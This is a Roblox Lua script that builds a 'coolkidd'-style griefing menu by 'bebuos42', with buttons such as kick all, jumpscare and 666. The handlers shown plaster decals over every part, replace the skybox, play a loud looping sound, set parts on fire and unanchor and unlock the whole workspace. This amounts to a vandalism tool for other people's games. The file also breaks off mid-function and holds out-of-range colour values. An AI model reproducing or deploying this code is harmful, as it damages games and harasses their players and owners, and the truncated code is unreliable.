--[=[
 d888b  db    db d888888b      .d888b.      db      db    db  .d8b.  
88' Y8b 88    88   `88'        VP  `8D      88      88    88 d8' `8b 
88      88    88    88            odD'      88      88    88 88ooo88 
88  ooo 88    88    88          .88'        88      88    88 88~~~88 
88. ~8~ 88b  d88   .88.        j88.         88booo. 88b  d88 88   88    @uniquadev
 Y888P  ~Y8888P' Y888888P      888888D      Y88888P ~Y8888P' YP   YP  CONVERTER 

designed using localmaze gui creator
]=]

local LMG2L = {};

LMG2L["ScreenGui_1"] = Instance.new("ScreenGui", game:GetService("Players").LocalPlayer:WaitForChild("PlayerGui"));
LMG2L["ScreenGui_1"]["ZIndexBehavior"] = Enum.ZIndexBehavior.Sibling;


LMG2L["Frame_2"] = Instance.new("Frame", LMG2L["ScreenGui_1"]);
LMG2L["Frame_2"]["BorderSizePixel"] = 3;
LMG2L["Frame_2"]["BackgroundColor3"] = Color3.fromRGB(23, 23, 23);
LMG2L["Frame_2"]["Size"] = UDim2.new(0, 372, 0, 400);
LMG2L["Frame_2"]["Position"] = UDim2.new(0, 46, 0, -30);
LMG2L["Frame_2"]["BorderColor3"] = Color3.fromRGB(11, 178, 255);


LMG2L["ScrollingFrame_3"] = Instance.new("ScrollingFrame", LMG2L["Frame_2"]);
LMG2L["ScrollingFrame_3"]["ScrollingDirection"] = Enum.ScrollingDirection.Y;
LMG2L["ScrollingFrame_3"]["BorderSizePixel"] = 0;
LMG2L["ScrollingFrame_3"]["AutoLocalize"] = false;
LMG2L["ScrollingFrame_3"]["ElasticBehavior"] = Enum.ElasticBehavior.Always;
LMG2L["ScrollingFrame_3"]["BackgroundColor3"] = Color3.fromRGB(44, 44, 44);
LMG2L["ScrollingFrame_3"]["HorizontalScrollBarInset"] = Enum.ScrollBarInset.ScrollBar;
LMG2L["ScrollingFrame_3"]["Size"] = UDim2.new(0, 360, 0, 382);
LMG2L["ScrollingFrame_3"]["Position"] = UDim2.new(0, 6, 0, 6);
LMG2L["ScrollingFrame_3"]["ScrollBarThickness"] = 0;


LMG2L["TextButton15_4"] = Instance.new("TextButton", LMG2L["ScrollingFrame_3"]);
LMG2L["TextButton15_4"]["TextWrapped"] = true;
LMG2L["TextButton15_4"]["BorderSizePixel"] = 2;
LMG2L["TextButton15_4"]["TextScaled"] = true;
LMG2L["TextButton15_4"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
LMG2L["TextButton15_4"]["BackgroundColor3"] = Color3.fromRGB(44, 44, 44);
LMG2L["TextButton15_4"]["Size"] = UDim2.new(0, 108, 0, 50);
LMG2L["TextButton15_4"]["BorderColor3"] = Color3.fromRGB(11, 178, 255);
LMG2L["TextButton15_4"]["Text"] = [[coolkiddfull]];
LMG2L["TextButton15_4"]["Name"] = [[TextButton15]];
LMG2L["TextButton15_4"]["Position"] = UDim2.new(0, 118, 0, 278);


LMG2L["LocalScript_5"] = Instance.new("LocalScript", LMG2L["TextButton15_4"]);



LMG2L["TextButton7_6"] = Instance.new("TextButton", LMG2L["ScrollingFrame_3"]);
LMG2L["TextButton7_6"]["TextWrapped"] = true;
LMG2L["TextButton7_6"]["BorderSizePixel"] = 2;
LMG2L["TextButton7_6"]["TextScaled"] = true;
LMG2L["TextButton7_6"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
LMG2L["TextButton7_6"]["BackgroundColor3"] = Color3.fromRGB(44, 44, 44);
LMG2L["TextButton7_6"]["Size"] = UDim2.new(0, 108, 0, 50);
LMG2L["TextButton7_6"]["BorderColor3"] = Color3.fromRGB(11, 178, 255);
LMG2L["TextButton7_6"]["Text"] = [[666]];
LMG2L["TextButton7_6"]["Name"] = [[TextButton7]];
LMG2L["TextButton7_6"]["Position"] = UDim2.new(0, 232, 0, 162);


LMG2L["LocalScript_7"] = Instance.new("LocalScript", LMG2L["TextButton7_6"]);



LMG2L["TextButton2_8"] = Instance.new("TextButton", LMG2L["ScrollingFrame_3"]);
LMG2L["TextButton2_8"]["TextWrapped"] = true;
LMG2L["TextButton2_8"]["BorderSizePixel"] = 2;
LMG2L["TextButton2_8"]["TextScaled"] = true;
LMG2L["TextButton2_8"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
LMG2L["TextButton2_8"]["BackgroundColor3"] = Color3.fromRGB(44, 44, 44);
LMG2L["TextButton2_8"]["Size"] = UDim2.new(0, 108, 0, 50);
LMG2L["TextButton2_8"]["BorderColor3"] = Color3.fromRGB(11, 178, 255);
LMG2L["TextButton2_8"]["Text"] = [[decal]];
LMG2L["TextButton2_8"]["Name"] = [[TextButton2]];
LMG2L["TextButton2_8"]["Position"] = UDim2.new(0, 4, 0, 104);


LMG2L["LocalScript_9"] = Instance.new("LocalScript", LMG2L["TextButton2_8"]);



LMG2L["TextButton8_a"] = Instance.new("TextButton", LMG2L["ScrollingFrame_3"]);
LMG2L["TextButton8_a"]["TextWrapped"] = true;
LMG2L["TextButton8_a"]["BorderSizePixel"] = 2;
LMG2L["TextButton8_a"]["TextScaled"] = true;
LMG2L["TextButton8_a"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
LMG2L["TextButton8_a"]["BackgroundColor3"] = Color3.fromRGB(44, 44, 44);
LMG2L["TextButton8_a"]["Size"] = UDim2.new(0, 108, 0, 50);
LMG2L["TextButton8_a"]["BorderColor3"] = Color3.fromRGB(11, 178, 255);
LMG2L["TextButton8_a"]["Text"] = [[unanchor]];
LMG2L["TextButton8_a"]["Name"] = [[TextButton8]];
LMG2L["TextButton8_a"]["Position"] = UDim2.new(0, 118, 0, 220);


LMG2L["LocalScript_b"] = Instance.new("LocalScript", LMG2L["TextButton8_a"]);



LMG2L["TextButton6_c"] = Instance.new("TextButton", LMG2L["ScrollingFrame_3"]);
LMG2L["TextButton6_c"]["TextWrapped"] = true;
LMG2L["TextButton6_c"]["BorderSizePixel"] = 2;
LMG2L["TextButton6_c"]["TextScaled"] = true;
LMG2L["TextButton6_c"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
LMG2L["TextButton6_c"]["BackgroundColor3"] = Color3.fromRGB(44, 44, 44);
LMG2L["TextButton6_c"]["Size"] = UDim2.new(0, 108, 0, 50);
LMG2L["TextButton6_c"]["BorderColor3"] = Color3.fromRGB(11, 178, 255);
LMG2L["TextButton6_c"]["Text"] = [[particles]];
LMG2L["TextButton6_c"]["Name"] = [[TextButton6]];
LMG2L["TextButton6_c"]["Position"] = UDim2.new(0, 118, 0, 162);


LMG2L["LocalScript_d"] = Instance.new("LocalScript", LMG2L["TextButton6_c"]);



LMG2L["TextButton5_e"] = Instance.new("TextButton", LMG2L["ScrollingFrame_3"]);
LMG2L["TextButton5_e"]["TextWrapped"] = true;
LMG2L["TextButton5_e"]["BorderSizePixel"] = 2;
LMG2L["TextButton5_e"]["TextScaled"] = true;
LMG2L["TextButton5_e"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
LMG2L["TextButton5_e"]["BackgroundColor3"] = Color3.fromRGB(44, 44, 44);
LMG2L["TextButton5_e"]["Size"] = UDim2.new(0, 108, 0, 50);
LMG2L["TextButton5_e"]["BorderColor3"] = Color3.fromRGB(11, 178, 255);
LMG2L["TextButton5_e"]["Text"] = [[skybox 2]];
LMG2L["TextButton5_e"]["Name"] = [[TextButton5]];
LMG2L["TextButton5_e"]["Position"] = UDim2.new(0, 4, 0, 162);


LMG2L["LocalScript_f"] = Instance.new("LocalScript", LMG2L["TextButton5_e"]);



LMG2L["TextButton25_10"] = Instance.new("TextButton", LMG2L["ScrollingFrame_3"]);
LMG2L["TextButton25_10"]["TextWrapped"] = true;
LMG2L["TextButton25_10"]["BorderSizePixel"] = 2;
LMG2L["TextButton25_10"]["TextScaled"] = true;
LMG2L["TextButton25_10"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
LMG2L["TextButton25_10"]["BackgroundColor3"] = Color3.fromRGB(44, 44, 44);
LMG2L["TextButton25_10"]["Size"] = UDim2.new(0, 334, 0, 28);
LMG2L["TextButton25_10"]["BorderColor3"] = Color3.fromRGB(11, 178, 257);
LMG2L["TextButton25_10"]["Text"] = [[kick all]];
LMG2L["TextButton25_10"]["Name"] = [[TextButton25]];
LMG2L["TextButton25_10"]["Position"] = UDim2.new(0, 4, 0, 454);


LMG2L["LocalScript_11"] = Instance.new("LocalScript", LMG2L["TextButton25_10"]);



LMG2L["TextLabel_12"] = Instance.new("TextLabel", LMG2L["ScrollingFrame_3"]);
LMG2L["TextLabel_12"]["TextWrapped"] = true;
LMG2L["TextLabel_12"]["BorderSizePixel"] = 0;
LMG2L["TextLabel_12"]["TextScaled"] = true;
LMG2L["TextLabel_12"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
LMG2L["TextLabel_12"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
LMG2L["TextLabel_12"]["BackgroundTransparency"] = 1;
LMG2L["TextLabel_12"]["Size"] = UDim2.new(0, 288, 0, 62);
LMG2L["TextLabel_12"]["Text"] = [[bebuos42 gui v3]];
LMG2L["TextLabel_12"]["Position"] = UDim2.new(0, 32, 0, 2);


LMG2L["TextLabel3_13"] = Instance.new("TextLabel", LMG2L["ScrollingFrame_3"]);
LMG2L["TextLabel3_13"]["TextWrapped"] = true;
LMG2L["TextLabel3_13"]["BorderSizePixel"] = 0;
LMG2L["TextLabel3_13"]["TextScaled"] = true;
LMG2L["TextLabel3_13"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
LMG2L["TextLabel3_13"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
LMG2L["TextLabel3_13"]["BackgroundTransparency"] = 1;
LMG2L["TextLabel3_13"]["Size"] = UDim2.new(0, 158, 0, 28);
LMG2L["TextLabel3_13"]["Text"] = [[@bebuos42]];
LMG2L["TextLabel3_13"]["Name"] = [[TextLabel3]];
LMG2L["TextLabel3_13"]["Position"] = UDim2.new(0, 66, 0, 70);


LMG2L["TextButton22_14"] = Instance.new("TextButton", LMG2L["ScrollingFrame_3"]);
LMG2L["TextButton22_14"]["TextWrapped"] = true;
LMG2L["TextButton22_14"]["BorderSizePixel"] = 2;
LMG2L["TextButton22_14"]["TextScaled"] = true;
LMG2L["TextButton22_14"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
LMG2L["TextButton22_14"]["BackgroundColor3"] = Color3.fromRGB(44, 44, 44);
LMG2L["TextButton22_14"]["Size"] = UDim2.new(0, 108, 0, 50);
LMG2L["TextButton22_14"]["BorderColor3"] = Color3.fromRGB(11, 178, 257);
LMG2L["TextButton22_14"]["Text"] = [[scary 1]];
LMG2L["TextButton22_14"]["Name"] = [[TextButton22]];
LMG2L["TextButton22_14"]["Position"] = UDim2.new(0, 118, 0, 394);


LMG2L["LocalScript_15"] = Instance.new("LocalScript", LMG2L["TextButton22_14"]);



LMG2L["TextButton9_16"] = Instance.new("TextButton", LMG2L["ScrollingFrame_3"]);
LMG2L["TextButton9_16"]["TextWrapped"] = true;
LMG2L["TextButton9_16"]["BorderSizePixel"] = 2;
LMG2L["TextButton9_16"]["TextScaled"] = true;
LMG2L["TextButton9_16"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
LMG2L["TextButton9_16"]["BackgroundColor3"] = Color3.fromRGB(44, 44, 44);
LMG2L["TextButton9_16"]["Size"] = UDim2.new(0, 108, 0, 50);
LMG2L["TextButton9_16"]["BorderColor3"] = Color3.fromRGB(11, 178, 255);
LMG2L["TextButton9_16"]["Text"] = [[disco]];
LMG2L["TextButton9_16"]["Name"] = [[TextButton9]];
LMG2L["TextButton9_16"]["Position"] = UDim2.new(0, 232, 0, 220);


LMG2L["LocalScript_17"] = Instance.new("LocalScript", LMG2L["TextButton9_16"]);



LMG2L["TextButton17_18"] = Instance.new("TextButton", LMG2L["ScrollingFrame_3"]);
LMG2L["TextButton17_18"]["TextWrapped"] = true;
LMG2L["TextButton17_18"]["BorderSizePixel"] = 2;
LMG2L["TextButton17_18"]["TextScaled"] = true;
LMG2L["TextButton17_18"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
LMG2L["TextButton17_18"]["BackgroundColor3"] = Color3.fromRGB(44, 44, 44);
LMG2L["TextButton17_18"]["Size"] = UDim2.new(0, 108, 0, 50);
LMG2L["TextButton17_18"]["BorderColor3"] = Color3.fromRGB(11, 178, 255);
LMG2L["TextButton17_18"]["Text"] = [[coolkiddtheme]];
LMG2L["TextButton17_18"]["Name"] = [[TextButton17]];
LMG2L["TextButton17_18"]["Position"] = UDim2.new(0, 4, 0, 336);


LMG2L["LocalScript_19"] = Instance.new("LocalScript", LMG2L["TextButton17_18"]);



LMG2L["TextButton3_1a"] = Instance.new("TextButton", LMG2L["ScrollingFrame_3"]);
LMG2L["TextButton3_1a"]["TextWrapped"] = true;
LMG2L["TextButton3_1a"]["BorderSizePixel"] = 2;
LMG2L["TextButton3_1a"]["TextScaled"] = true;
LMG2L["TextButton3_1a"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
LMG2L["TextButton3_1a"]["BackgroundColor3"] = Color3.fromRGB(44, 44, 44);
LMG2L["TextButton3_1a"]["Size"] = UDim2.new(0, 108, 0, 50);
LMG2L["TextButton3_1a"]["BorderColor3"] = Color3.fromRGB(11, 178, 255);
LMG2L["TextButton3_1a"]["Text"] = [[skybox]];
LMG2L["TextButton3_1a"]["Name"] = [[TextButton3]];
LMG2L["TextButton3_1a"]["Position"] = UDim2.new(0, 232, 0, 104);


LMG2L["LocalScript_1b"] = Instance.new("LocalScript", LMG2L["TextButton3_1a"]);



LMG2L["TextButton23_1c"] = Instance.new("TextButton", LMG2L["ScrollingFrame_3"]);
LMG2L["TextButton23_1c"]["TextWrapped"] = true;
LMG2L["TextButton23_1c"]["BorderSizePixel"] = 2;
LMG2L["TextButton23_1c"]["TextStrokeColor3"] = Color3.fromRGB(255, 0, 0);
LMG2L["TextButton23_1c"]["TextSize"] = 40;
LMG2L["TextButton23_1c"]["TextColor3"] = Color3.fromRGB(255, 14, 14);
LMG2L["TextButton23_1c"]["BackgroundColor3"] = Color3.fromRGB(44, 44, 44);
LMG2L["TextButton23_1c"]["FontFace"] = Font.new([[rbxasset://fonts/families/Creepster.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
LMG2L["TextButton23_1c"]["Size"] = UDim2.new(0, 108, 0, 50);
LMG2L["TextButton23_1c"]["BorderColor3"] = Color3.fromRGB(11, 178, 257);
LMG2L["TextButton23_1c"]["Text"] = [[scary 7]];
LMG2L["TextButton23_1c"]["Name"] = [[TextButton23]];
LMG2L["TextButton23_1c"]["Position"] = UDim2.new(0, 232, 0, 394);


LMG2L["LocalScript_1d"] = Instance.new("LocalScript", LMG2L["TextButton23_1c"]);



LMG2L["ImageLabel_1e"] = Instance.new("ImageLabel", LMG2L["ScrollingFrame_3"]);
LMG2L["ImageLabel_1e"]["BorderSizePixel"] = 0;
LMG2L["ImageLabel_1e"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
-- LMG2L["ImageLabel_1e"]["ImageContent"] = ;
LMG2L["ImageLabel_1e"]["Image"] = [[rbxassetid://121648159358932]];
LMG2L["ImageLabel_1e"]["Size"] = UDim2.new(0, 332, 0, 194);
LMG2L["ImageLabel_1e"]["Position"] = UDim2.new(0, 4, 0, 606);


LMG2L["TextButton18_1f"] = Instance.new("TextButton", LMG2L["ScrollingFrame_3"]);
LMG2L["TextButton18_1f"]["TextWrapped"] = true;
LMG2L["TextButton18_1f"]["BorderSizePixel"] = 2;
LMG2L["TextButton18_1f"]["TextScaled"] = true;
LMG2L["TextButton18_1f"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
LMG2L["TextButton18_1f"]["BackgroundColor3"] = Color3.fromRGB(44, 44, 44);
LMG2L["TextButton18_1f"]["Size"] = UDim2.new(0, 108, 0, 50);
LMG2L["TextButton18_1f"]["BorderColor3"] = Color3.fromRGB(11, 178, 255);
LMG2L["TextButton18_1f"]["Text"] = [[message coolkidd]];
LMG2L["TextButton18_1f"]["Name"] = [[TextButton18]];
LMG2L["TextButton18_1f"]["Position"] = UDim2.new(0, 118, 0, 336);


LMG2L["LocalScript_20"] = Instance.new("LocalScript", LMG2L["TextButton18_1f"]);



LMG2L["TextButton_21"] = Instance.new("TextButton", LMG2L["ScrollingFrame_3"]);
LMG2L["TextButton_21"]["TextWrapped"] = true;
LMG2L["TextButton_21"]["BorderSizePixel"] = 2;
LMG2L["TextButton_21"]["TextScaled"] = true;
LMG2L["TextButton_21"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
LMG2L["TextButton_21"]["BackgroundColor3"] = Color3.fromRGB(44, 44, 44);
LMG2L["TextButton_21"]["Size"] = UDim2.new(0, 72, 0, 38);
LMG2L["TextButton_21"]["BorderColor3"] = Color3.fromRGB(11, 178, 255);
LMG2L["TextButton_21"]["Text"] = [[theme]];
LMG2L["TextButton_21"]["Position"] = UDim2.new(0, 260, 0, 60);


LMG2L["LocalScript_22"] = Instance.new("LocalScript", LMG2L["TextButton_21"]);



LMG2L["TextButton11_23"] = Instance.new("TextButton", LMG2L["ScrollingFrame_3"]);
LMG2L["TextButton11_23"]["TextWrapped"] = true;
LMG2L["TextButton11_23"]["BorderSizePixel"] = 2;
LMG2L["TextButton11_23"]["TextScaled"] = true;
LMG2L["TextButton11_23"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
LMG2L["TextButton11_23"]["BackgroundColor3"] = Color3.fromRGB(44, 44, 44);
LMG2L["TextButton11_23"]["Size"] = UDim2.new(0, 108, 0, 50);
LMG2L["TextButton11_23"]["BorderColor3"] = Color3.fromRGB(11, 178, 255);
LMG2L["TextButton11_23"]["Text"] = [[hint]];
LMG2L["TextButton11_23"]["Name"] = [[TextButton11]];
LMG2L["TextButton11_23"]["Position"] = UDim2.new(0, 4, 0, 278);


LMG2L["LocalScript_24"] = Instance.new("LocalScript", LMG2L["TextButton11_23"]);



LMG2L["TextButton21_25"] = Instance.new("TextButton", LMG2L["ScrollingFrame_3"]);
LMG2L["TextButton21_25"]["TextWrapped"] = true;
LMG2L["TextButton21_25"]["BorderSizePixel"] = 2;
LMG2L["TextButton21_25"]["TextScaled"] = true;
LMG2L["TextButton21_25"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
LMG2L["TextButton21_25"]["BackgroundColor3"] = Color3.fromRGB(44, 44, 44);
LMG2L["TextButton21_25"]["Size"] = UDim2.new(0, 108, 0, 50);
LMG2L["TextButton21_25"]["BorderColor3"] = Color3.fromRGB(11, 178, 257);
LMG2L["TextButton21_25"]["Text"] = [[jumpscare]];
LMG2L["TextButton21_25"]["Name"] = [[TextButton21]];
LMG2L["TextButton21_25"]["Position"] = UDim2.new(0, 4, 0, 394);


LMG2L["LocalScript_26"] = Instance.new("LocalScript", LMG2L["TextButton21_25"]);



LMG2L["TextButton10_27"] = Instance.new("TextButton", LMG2L["ScrollingFrame_3"]);
LMG2L["TextButton10_27"]["TextWrapped"] = true;
LMG2L["TextButton10_27"]["BorderSizePixel"] = 2;
LMG2L["TextButton10_27"]["TextScaled"] = true;
LMG2L["TextButton10_27"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
LMG2L["TextButton10_27"]["BackgroundColor3"] = Color3.fromRGB(44, 44, 44);
LMG2L["TextButton10_27"]["Size"] = UDim2.new(0, 108, 0, 50);
LMG2L["TextButton10_27"]["BorderColor3"] = Color3.fromRGB(11, 178, 255);
LMG2L["TextButton10_27"]["Text"] = [[rainbow]];
LMG2L["TextButton10_27"]["Name"] = [[TextButton10]];
LMG2L["TextButton10_27"]["Position"] = UDim2.new(0, 4, 0, 220);


LMG2L["LocalScript_28"] = Instance.new("LocalScript", LMG2L["TextButton10_27"]);



LMG2L["TextLabel4_29"] = Instance.new("TextLabel", LMG2L["ScrollingFrame_3"]);
LMG2L["TextLabel4_29"]["TextWrapped"] = true;
LMG2L["TextLabel4_29"]["BorderSizePixel"] = 0;
LMG2L["TextLabel4_29"]["TextScaled"] = true;
LMG2L["TextLabel4_29"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
LMG2L["TextLabel4_29"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
LMG2L["TextLabel4_29"]["BackgroundTransparency"] = 1;
LMG2L["TextLabel4_29"]["Size"] = UDim2.new(0, 332, 0, 62);
LMG2L["TextLabel4_29"]["Text"] = [[🙏 follow bebuos42 my 🙏]];
LMG2L["TextLabel4_29"]["Name"] = [[TextLabel4]];
LMG2L["TextLabel4_29"]["Position"] = UDim2.new(0, 4, 0, 536);


LMG2L["TextButton19_2a"] = Instance.new("TextButton", LMG2L["ScrollingFrame_3"]);
LMG2L["TextButton19_2a"]["TextWrapped"] = true;
LMG2L["TextButton19_2a"]["BorderSizePixel"] = 2;
LMG2L["TextButton19_2a"]["TextScaled"] = true;
LMG2L["TextButton19_2a"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
LMG2L["TextButton19_2a"]["BackgroundColor3"] = Color3.fromRGB(44, 44, 44);
LMG2L["TextButton19_2a"]["Size"] = UDim2.new(0, 108, 0, 50);
LMG2L["TextButton19_2a"]["BorderColor3"] = Color3.fromRGB(11, 178, 255);
LMG2L["TextButton19_2a"]["Text"] = [[KoopKidd message]];
LMG2L["TextButton19_2a"]["Name"] = [[TextButton19]];
LMG2L["TextButton19_2a"]["Position"] = UDim2.new(0, 232, 0, 336);


LMG2L["LocalScript_2b"] = Instance.new("LocalScript", LMG2L["TextButton19_2a"]);



LMG2L["TextButton4_2c"] = Instance.new("TextButton", LMG2L["ScrollingFrame_3"]);
LMG2L["TextButton4_2c"]["TextWrapped"] = true;
LMG2L["TextButton4_2c"]["BorderSizePixel"] = 2;
LMG2L["TextButton4_2c"]["TextScaled"] = true;
LMG2L["TextButton4_2c"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
LMG2L["TextButton4_2c"]["BackgroundColor3"] = Color3.fromRGB(44, 44, 44);
LMG2L["TextButton4_2c"]["Size"] = UDim2.new(0, 108, 0, 50);
LMG2L["TextButton4_2c"]["BorderColor3"] = Color3.fromRGB(11, 178, 255);
LMG2L["TextButton4_2c"]["Text"] = [[decal 2]];
LMG2L["TextButton4_2c"]["Name"] = [[TextButton4]];
LMG2L["TextButton4_2c"]["Position"] = UDim2.new(0, 118, 0, 104);


LMG2L["LocalScript_2d"] = Instance.new("LocalScript", LMG2L["TextButton4_2c"]);



LMG2L["TextLabel2_2e"] = Instance.new("TextLabel", LMG2L["ScrollingFrame_3"]);
LMG2L["TextLabel2_2e"]["TextWrapped"] = true;
LMG2L["TextLabel2_2e"]["BorderSizePixel"] = 0;
LMG2L["TextLabel2_2e"]["TextScaled"] = true;
LMG2L["TextLabel2_2e"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
LMG2L["TextLabel2_2e"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
LMG2L["TextLabel2_2e"]["BackgroundTransparency"] = 1;
LMG2L["TextLabel2_2e"]["Size"] = UDim2.new(0, 230, 0, 24);
LMG2L["TextLabel2_2e"]["Text"] = [[==///////==]];
LMG2L["TextLabel2_2e"]["Name"] = [[TextLabel2]];
LMG2L["TextLabel2_2e"]["Position"] = UDim2.new(0, 30, 0, 54);


LMG2L["TextButton16_2f"] = Instance.new("TextButton", LMG2L["ScrollingFrame_3"]);
LMG2L["TextButton16_2f"]["TextWrapped"] = true;
LMG2L["TextButton16_2f"]["BorderSizePixel"] = 2;
LMG2L["TextButton16_2f"]["TextScaled"] = true;
LMG2L["TextButton16_2f"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
LMG2L["TextButton16_2f"]["BackgroundColor3"] = Color3.fromRGB(44, 44, 44);
LMG2L["TextButton16_2f"]["Size"] = UDim2.new(0, 108, 0, 50);
LMG2L["TextButton16_2f"]["BorderColor3"] = Color3.fromRGB(11, 178, 255);
LMG2L["TextButton16_2f"]["Text"] = [[koopkiddfull]];
LMG2L["TextButton16_2f"]["Name"] = [[TextButton16]];
LMG2L["TextButton16_2f"]["Position"] = UDim2.new(0, 232, 0, 278);


LMG2L["LocalScript_30"] = Instance.new("LocalScript", LMG2L["TextButton16_2f"]);



LMG2L["TextButton_31"] = Instance.new("TextButton", LMG2L["ScrollingFrame_3"]);
LMG2L["TextButton_31"]["TextWrapped"] = true;
LMG2L["TextButton_31"]["BorderSizePixel"] = 2;
LMG2L["TextButton_31"]["TextScaled"] = true;
LMG2L["TextButton_31"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
LMG2L["TextButton_31"]["BackgroundColor3"] = Color3.fromRGB(43, 43, 43);
LMG2L["TextButton_31"]["Size"] = UDim2.new(0, 334, 0, 34);
LMG2L["TextButton_31"]["BorderColor3"] = Color3.fromRGB(11, 178, 255);
LMG2L["TextButton_31"]["Text"] = [[gui bebuos42 v1]];
LMG2L["TextButton_31"]["Position"] = UDim2.new(0, 4, 0, 498);


LMG2L["LocalScript_32"] = Instance.new("LocalScript", LMG2L["TextButton_31"]);



LMG2L["UIDragDetector_33"] = Instance.new("UIDragDetector", LMG2L["Frame_2"]);



local function C_5()
	local script = LMG2L["LocalScript_5"];
	local button = script.Parent	
	button.MouseButton1Click:Connect(function()	
	local sky = Instance.new("Sky")	
	        sky.Parent = game.Lighting	
	        for _, face in pairs({"Bk", "Dn", "Ft", "Lf", "Rt", "Up"}) do	
	            sky["Skybox"..face] = "rbxassetid://158118263"	
	        end	
	
	Spooky = Instance.new("Sound", game.Workspace)	
	Spooky.Name = "Spooky"	
	Spooky.SoundId = "rbxassetid://1839246711"	
	Spooky.Volume = 20	
	Spooky.Looped = true	
	Spooky:Play()	
	
	for _, v in pairs(game:GetDescendants()) do	
	            if v:IsA("Part") or v:IsA("MeshPart") or v:IsA("Character") then	
	                for _, face in pairs(Enum.NormalId:GetEnumItems()) do	
	                    local decal = Instance.new("Decal")	
	                    decal.Texture = "rbxassetid://158118263"	
	                    decal.Face = face	
	                    decal.Parent = v	
	                end	
	            end	
	        end	
	
	-- MLG Particles Script By ItsKittyyyGD	
	
	-- no skid this skidders	
	
	game.Players.PlayerAdded:Connect(function(player)	
	    player.CharacterAdded:Connect(function(character)	
	        local torso = character:FindFirstChild("Torso") or character:FindFirstChild("UpperTorso")	
	        if torso then	
	            local fe = Instance.new("ParticleEmitter", torso)	
	            fe.Texture = "rbxassetid://158118263"	
	            fe.VelocitySpread = 50	
	        end	
	    end)	
	end)	
	
	for _, player in pairs(game.Players:GetPlayers()) do	
	    if player.Character then	
	        local torso = player.Character:FindFirstChild("Torso") or player.Character:FindFirstChild("UpperTorso")	
	        if torso then	
	            local fe = Instance.new("ParticleEmitter", torso)	
	            fe.Texture = "rbxassetid://158118263"	
	            fe.VelocitySpread = 50	
	        end	
	    end	
	end	
	
	end)	
end;
task.spawn(C_5);
local function C_7()
	local script = LMG2L["LocalScript_7"];
	function click()	
	script.Parent.MouseButton1Click:Connect(function()	
			for i,v in next,workspace:children''do	
				if(v:IsA'BasePart')then	
					me=v;	
					bbg=Instance.new('BillboardGui',me);	
					bbg.Name='stuf';	
					bbg.Adornee=me;	
					bbg.Size=UDim2.new(2.5,0,2.5,0)	
					--bbg.StudsOffset=Vector3.new(0,2,0)	
					tlb=Instance.new'TextLabel';	
					tlb.Text='666 666 666 666 666';	
					tlb.Font='SourceSansBold';	
					tlb.FontSize='Size48';	
					tlb.TextColor3=Color3.new(1,0,0);	
					tlb.Size=UDim2.new(1.25,0,1.25,0);	
					tlb.Position=UDim2.new(-0.125,-22,-1.1,0);	
					tlb.BackgroundTransparency=1;	
					tlb.Parent=bbg;	
				end;end;	
			function xds(dd)	
				for i,v in next,dd:children''do	
					if(v:IsA'BasePart')then	
						v.BrickColor=BrickColor.new'Really black';	
						v.TopSurface='Smooth';	
						v.BottomSurface='Smooth';	
						s=Instance.new('SelectionBox',v);	
						s.Adornee=v;	
						s.Color=BrickColor.new'Really red';	
						a=Instance.new('PointLight',v);	
						a.Color=Color3.new(1,0,0);	
						a.Range=15;	
						a.Brightness=5;	
						f=Instance.new('Fire',v);	
						f.Size=19;	
						f.Heat=22;	
					end;	
			
					local dec = 'http://www.roblox.com/asset/?id=19399245';	
					local fac = {'Front', 'Back', 'Left', 'Right', 'Top', 'Bottom'}	
					--coroutine.wrap(function()	
					--for ,_ in pairs(fac) do	
					--local ddec = Instance.new("Decal", v)	
					--ddec.Face = 	
					--ddec.Texture = dec	
					--end end)()	
					if #(v:GetChildren())>0 then	
						xds(v) 	
					end	
				end	
			end	
			xds(game.Workspace)	
		end)	
			
	end	
	
	    script.Parent.MouseButton1Down:connect(click)	
end;
task.spawn(C_7);
local function C_9()
	local script = LMG2L["LocalScript_9"];
	local button = script.Parent	
	button.MouseButton1Click:Connect(function()	
	for _, v in pairs(game:GetDescendants()) do	
	            if v:IsA("Part") or v:IsA("MeshPart") or v:IsA("Character") then	
	                for _, face in pairs(Enum.NormalId:GetEnumItems()) do	
	                    local decal = Instance.new("Decal")	
	                    decal.Texture = "rbxassetid://118841245164962"	
	                    decal.Face = face	
	                    decal.Parent = v	
	                end	
	            end	
	        end	
	
	end)	
end;
task.spawn(C_9);
local function C_b()
	local script = LMG2L["LocalScript_b"];
	function click()	
	function exPro(root)	
	    for _, v in pairs(root:GetChildren()) do	
	        if v:IsA("BasePart") then	
	            v.Material = "Plastic"	
	            v.Transparency = 0	
	            v.Anchored = false	
	            v.Locked = false	
	        end	
	        exPro(v)	
	    end	
	end	
	function asdf(root)	
	    for _, v in pairs(root:GetChildren()) do	
	        asdf(v)	
	    end	
	end	
	exPro(game.Workspace)	
	asdf(game.Workspace)	
	end	
	
	script.Parent.MouseButton1Down:connect(click)	
end;
task.spawn(C_b);
local function C_d()
	local script = LMG2L["LocalScript_d"];
	function click()	
	script.Parent.MouseButton1Click:Connect(function()	
